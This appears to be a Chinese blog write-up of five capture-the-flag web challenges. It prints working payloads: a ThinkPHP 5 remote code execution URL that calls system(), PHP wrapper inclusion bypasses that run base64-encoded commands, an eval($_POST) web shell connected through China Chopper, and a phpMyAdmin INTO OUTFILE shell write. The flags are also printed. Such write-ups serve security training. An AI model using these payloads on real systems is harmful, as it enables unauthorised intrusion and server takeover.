攻防世界：Web高手进阶区

短命女 2023-01-19 03:27 262阅读 0赞

攻防世界：Web高手进阶区

### 文章目录 ###

*   *  1、aNNaNNaNNaN-Batman
     *  2、baby\_web
     *  3、Training-WWW-Robots
     *  4、php\_rce
     *  5、Web\_php\_include

--------------------

## 1、aNNaNNaNNaN-Batman ##

题目：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70]  
下载下来得到附件，解压。  
![在这里插入图片描述][20210507170122114.png]  
用txt打开

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 1]  
发现是一个JavaScript脚本。  
看着有些乱码，试看看弹窗内容，把末尾的eval改成alert，然后后缀改为html。  
![在这里插入图片描述][20210507170744570.png]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 2]  
双击浏览器打开，就能看到弹出内容。

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 3]  
这回看到是正经的代码了，整理得到如下代码。

看代码段意思，是要输入些什么，果断原文件改后缀为html，浏览器打开看看有什么输入框。  
![在这里插入图片描述][20210507171057566.png]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 4]  
看来要输入些啥就可以得到flag了。  
if(e.length == 16)  
if(e.match(/^be0f23/)!=null)  
if(e.match(/233ac/)!=null)  
if(e.match(/e98aa$/)!=null)  
if(e.match(/c7be9/)!=null)  
要满足这一串条件：  
以be0f23开头，以e98aa结尾，把字符串抠出来拼接，得：  
be0f23233acc7be9e98aa  
还有个要求长度要等于16，那把重复的字符干掉，得到：  
be0f233ac7be98aa  
然后把这段字符输入到输入框里：  
![在这里插入图片描述][20210507171508420.png]  
点OK就能得到flag：flag\{it’s\_a\_h0le\_in\_0ne\}  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 5]

## 2、baby\_web ##

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 6]  
初始页面不就是index.php吗？  
访问index.php，又会自动跳转回到1.php  
![在这里插入图片描述][20210613165659746.png]  
那就访问index.php，抓包看看能抓到什么。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 7]  
没想到真有flag回来。  
flag\{very\_baby\_web\}

## 3、Training-WWW-Robots ##

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 8]  
题目说了是robots相关，那么肯定是访问：robots.txt先。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 9]  
然后大概率f10g.php是目标了，访问看看。  
![在这里插入图片描述][20210613171028905.png]  
额呵呵，得到flag:  
cyberpeace\{d14be4089d1687ada500336365cc99db\}

## 4、php\_rce ##

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 10]  
打开题目，得到页面  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 11]  
明显是ThinkPHP V5漏洞利用，百度ThinkPHP V5漏洞 payload，得到：  
http://xxx/index.php?s=index/think\\app/invokefunction&function=call\_user\_func\_array&vars\[0\]=system&vars\[1\]\[\]=whoami

使用payload访问得到：  
![在这里插入图片描述][202106131751569.png]  
然后使用ls一层层目录往上寻找flag文件：  
最终得到：  
http://111.200.241.244:54258/index.php?s=index/think\\app/invokefunction&function=call\_user\_func\_array&vars\[0\]=system&vars\[1\]\[\]=ls%20…/…/…/…/  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 12]  
cat 查看flag文件，得到flag  
http://111.200.241.244:54258/index.php?s=index/think\\app/invokefunction&function=call\_user\_func\_array&vars\[0\]=system&vars\[1\]\[\]=cat%20…/…/…/…/flag  
![在这里插入图片描述][20210613175416520.png]  
flag\{thinkphp5\_rce\}

## 5、Web\_php\_include ##

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 13]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 14]  
从代码可以看到，做了php://审计  
由于strstr()这个函数是区分大小写的所以我们可以转换成大小写用PHP://input Post传输恶意代码

开启Brup Suite  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 15]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 16]  
顺利拿到flag:  
ctf\{876a5fca-96c6-4cbd-9075-46f0c89475d2\}

还可以使用data://伪协议来解题。  
格式一般都是这样：  
?xxx=data://text/plain;base64  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 17]

<?php system("ls");?>

base64加密后得到：  
PD9waHAgc3lzdGVtKCJscyIpOz8+Cg==  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 18]  
拿去跑，发现不好使，因为有个+号，浏览器没给URL编码，不认，所以给+号URL编码一下。  
得到： PD9waHAgc3lzdGVtKCJscyIpOz8%2BCg==  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 19]  
这回好使了，可以看到有个fl4gisisish3r3.php文件。  
cat 一下 fl4gisisish3r3.php 就好了。

<?php system("cat fl4gisisish3r3.php");?>

base64加密，得到：  
PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik7Pz4K  
拿去跑一下：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 20]  
发现也不好使？  
查看源码，才知道是隐藏在源码里。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 21]  
ctf\{876a5fca-96c6-4cbd-9075-46f0c89475d2\}

一句话木马，菜刀连接解题：  
这是我用的菜刀：https://download.csdn.net/download/xuhc25/19749348

http://111.200.241.244:54815/?page=data:text/plain,%3C?php%20@eval($\_POST\[%271%27\]);?%3E

具体菜刀连接如下图：空白处鼠标右键点击：添加  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 22]  
地址栏输入：  
http://111.200.241.244:54815/index.php?page=data:text/plain,%3C?php%20@eval($\_POST\[%271%27\]);?%3E  
具体配置如下：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 23]  
最后点击 添加。  
然后点击添加的地址。，更新下缓存  
![在这里插入图片描述][2021062015573475.png]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 24]  
下载flag文件：得到flag  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 25]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 26]

写入一句话木马解题：  
通过御剑目录扫描，看到有个数据库后台：  
http://111.200.241.244:54815/phpmyadmin/db\_create.php  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 27]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 28]  
试着root 空密码登录,竟然可以  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 29]  
写入一句话木马  
SELECT “<?php eval(@$\_POST\['1'\]); ?>”  
INTO OUTFILE ‘/tmp/1.php’  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 30]  
使用菜刀连接：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 31]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 32]  
然后一样是下载flag文件即可。

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70]: /images/20221021/b7b0b1ae7de44abba715919962c12d27.png
[20210507170122114.png]: /images/20221021/6187d81e0d3d4bdfa27e0e9d513fd75a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 1]: /images/20221021/7764f79ab70241b3a9d0f58b80db3ad2.png
[20210507170744570.png]: /images/20221021/44d82533d9a44f6c85f24b321c5fcf89.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 2]: /images/20221021/29186b219a344fef93656d5860ce6da1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 3]: /images/20221021/d2cb1cca50df437480a6db2e8d8d26d5.png
[20210507171057566.png]: /images/20221021/4d07c0a4d4b04f6ab93c7353877d3b28.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 4]: /images/20221021/eb72ef6f7f8049a289a6d180a32e3edd.png
[20210507171508420.png]: /images/20221021/ea0e1376a2824c35bf604f788e863550.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 5]: /images/20221021/0e727d3aaa1649d6b8ddd1414d87bf55.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 6]: /images/20221021/f0ed9be0fd7b454cb958c2553420357a.png
[20210613165659746.png]: /images/20221021/07f5bf09673c4a2bbaec032d2a0d18b1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 7]: /images/20221021/66b67b99514944d1983a2bff39004142.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 8]: /images/20221021/61d2bae9b611406fbea566a68d00bed1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 9]: /images/20221021/8dd204d43f914758bad23f6f948d7cae.png
[20210613171028905.png]: /images/20221021/4ddc50ad1dfc46ef8a13399043a95d92.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 10]: /images/20221021/f5e98435b37548b8acb6b078a7bae6a7.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 11]: /images/20221021/d035b2dc16504a75bc449c697389394e.png
[202106131751569.png]: /images/20221021/72cfb5130af940daa21808f88664c7ae.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 12]: /images/20221021/04378906047e4fa29763d2c3a6cf28db.png
[20210613175416520.png]: /images/20221021/4863c186a3aa43f5894d3608aef3c651.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 13]: /images/20221021/4d5434ba4ab54138a96a359c13c98f90.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 14]: /images/20221021/98bd3132677c441aa42272225c56fffc.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 15]: /images/20221021/685bd06cc3b94425afd11c7cc54138f2.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 16]: /images/20221021/d34a8fa9716b4482804280722eaa39ac.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 17]: /images/20221021/e6fdbf75ab124d21a86d08cd21f64d34.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 18]: /images/20221021/43585eb4d20b47d9bd1df69753cd708c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 19]: /images/20221021/7069183b7ca24917bb5070fc07ef3a12.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 20]: /images/20221021/9b114c905a464422945b14d7ee888453.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 21]: /images/20221021/3575bbcce684483d8066a9d4ddb77fde.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 22]: /images/20221021/0178ded29dd4477b91e3672923029f4e.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 23]: /images/20221021/9d2d0a646c9f468d803710295507a30f.png
[2021062015573475.png]: /images/20221021/70e91c05a10e4b87ab0eb8666d2d8d1e.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 24]: /images/20221021/7ff68c0bc0344b6caf896cba5cc1ed0c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 25]: /images/20221021/7fe80d4141794a118079c96ebe206043.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 26]: /images/20221021/50dedb04864849969ad8f5670580b11e.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 27]: /images/20221021/7b918e1e272f4ae3a8c76c8925e28c88.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 28]: /images/20221021/26b7803716ed4a9db65da2adef73e8b8.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 29]: /images/20221021/4fce45d6e663466685148eea72ab191d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 30]: /images/20221021/50eb966388e143d79bb3ae329a7b57ba.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 31]: /images/20221021/ce0c8a7680954087a48f28e91fab3711.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3h1aGMyNQ_size_16_color_FFFFFF_t_70 32]: /images/20221021/438c1ca0c2124f678abc0952348a73d1.png